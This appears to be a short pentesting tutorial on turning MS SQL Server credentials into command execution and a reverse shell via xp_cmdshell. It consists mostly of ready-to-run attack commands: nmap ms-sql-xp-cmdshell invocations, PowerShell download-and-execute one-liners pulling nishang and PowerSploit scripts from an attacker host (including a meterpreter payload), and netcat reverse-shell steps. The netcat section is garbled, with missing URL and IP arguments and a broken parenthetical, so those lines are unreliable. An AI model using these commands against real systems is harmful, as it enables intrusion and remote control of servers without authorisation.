🔝 How to get a xp_cmdshell reverse shell in a Windows Server
In a pentesting engagement, if you got the credentials of the MS SQL SERVER you can easily execute any command on the database server with…
In a pentesting engagement, if you got the credentials of the MS SQL SERVER you can easily execute any command on the database server with nmap NSE script, ms-sql-xp-cmdshell.
In the following example we execute whoami command in the MS SQL Windows server:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP
You have to substitute the following parameters of the above command:
mssql.username: Database username (sa in the example)
mssql.password: Database password (sa in the example)
ms-sql-xp-cmdshell.cmd: Command to execute (whoami in the example)
If you want to execute a reverse shell to connect back to your machine, you can use any of the Windows Powershell post exploitation frameworks shown below to do that.
xp_cmdshell with nishang
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"
xp_cmdshell with Powersploit
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"
xp_cmdshell with nc
First we need to download nc to the target machine ( from our machine (
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="powershell.exe wget -OutFile c:\\Users\Public\\nc.exe"
Now we can execute the reverse shell:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="c:\\Users\Public\\nc.exe -e cmd.exe 4444"